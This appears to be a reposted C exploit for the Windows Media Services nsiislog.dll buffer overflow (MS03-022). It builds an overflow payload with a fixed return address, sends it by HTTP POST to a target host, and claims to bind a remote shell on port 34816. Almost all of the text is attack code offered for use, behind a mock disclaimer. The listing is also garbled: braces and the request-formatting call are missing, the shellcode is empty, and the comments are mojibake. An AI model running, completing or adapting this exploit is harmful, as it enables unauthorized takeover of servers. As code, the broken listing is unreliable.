Windows Media Services Remote Command Execution (MS03-022)

     * Version TXT Disponible ici *
// Windows Media Services Remote Command Execution #2
                              // v. 1.0 beta
                              // (c) firew0rker  //tN  [The N0b0D1eS]


                              #ifdef WIN32
                              #pragma comment(lib, "wsock32")
                              #define SOCKET int
                              #define DWORD uint32_t
                              #define ULONG unsigned long
                              #define INVALID_SOCKET -1
                              #define SOCKET_ERROR -1
                              #define closesocket close

                              char shellcode[]=
                              //"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨

                              const DWORD default_EIP_pos = 9992; //¯®«®¦¥­¨¥ EIP ¢ ¡ãä¥à¥ (sploit)
                              const DWORD default_EBX_points_to = 9988; //㪠§ â¥«ì ¢ EBX ®â­®á¨â¥«ì­® sploit
                              //const DWORD default_EIP_value = 0x77F8441B; //¯® íâ®¬ã  ¤à. ¤.¡. JMP EDX, ¢ ¤ ­­®¬ á«ãç ¥ íâ® ¢ ntdll.dll
                              const DWORD default_EIP_value = 0x40F01333;
                              //const default_EDX_points_to = 0x1000; //íâ® ­¥ ¯à¨£®¤¨«®áì
                              char *nsiislog_default = "/scripts/nsiislog.dll";
                              char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
                              char sploitbuf[sizeof(sploit)*2];

                              void usage(char* argv[])
                              printf("Dicklamer (: "
                              "We are not responsible for the illegal use of this software.\n"
                              "Description: Binds shell to port 34816 (or higher if port busy).\n"
                              "Usage:    "
                              "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n"
                              "Supported target(s):\n"
                              "Windows version\t\t\t\tnsiislog.dll version\n"
                              "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]);

                              int main(int argc, char* argv[])
                              #ifdef WIN32
                              WSADATA wsaData;        
                              int target_port = 80;
                              char *nsiislog = nsiislog_default;
                              int             nArgIndex;

                              if (argc<2) usage(argv);
                              nArgIndex = 1;
                              while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
                              switch (argv[nArgIndex++][1])
                              case 'p':
                              case 'P':
                              target_port = atoi(argv[nArgIndex++]);
                              case 'r':
                              case 'R':
                              nsiislog = argv[nArgIndex++];

                              try {
                              #ifdef WIN32
                              WSAStartup(0x0101, &wsaData);
                              SOCKET s = socket(AF_INET,SOCK_STREAM,0);
                              if (s == INVALID_SOCKET) throw("No socket");
                              sockaddr_in addr;

                              //Ž¯à¥¤¥«ï¥¬  ¤à¥á á¥à¢ ª 
                              ULONG iaddr = inet_addr(argv[1]);
                              if (iaddr == INADDR_NONE) {//€¤à¥á - ¨¬ï á¥à¢ ª 
                              hostent *ph = gethostbyname(argv[1]);
                              if (!ph) throw("Cant resolve hostname");
                              } else {//€¤à¥á - IP

                              addr.sin_family = AF_INET;
                              addr.sin_port   = htons(target_port);
                              int sizeofaddr=sizeof(addr);

                              char *req = "MX_STATS_LogLine: ";
                              strcpy(sploit, req);
                              memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
                              //memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
                              memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
                              //¯à¨ ¯¥à¥å®¤¥ ­  EIP, EBX ¡ã¤¥â 㪠§ë¢ âì ­  ¯®á«¥¤­¨© DWORD ­ è¥£® § ¯à®á , £¤¥ JZ/JNZ
                              memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);

                              sploit[sizeof(sploit)-1] = 0;

                              if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");

                              "POST %s HTTP/1.0\r\n"
                              "Accept: */*\r\n"
                              "User-Agent: NSPlayer/\r\n"
                              "Content-Type: text/plain\r\n"
                              "Content-Length: %i\r\n"
                              "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"

                              int snd=send(s,sploitbuf,strlen(sploitbuf),0);
                              if (snd == strlen(sploitbuf)) printf("Target exploited.\n");
                              else throw("Cant send exploit");
                              catch (char *errmsg) 

                              return -1;
                              catch (int err_n) 
                              printf("error %i\n",err_n);
                              return err_n;
                              #ifdef WIN32
                              return 0;



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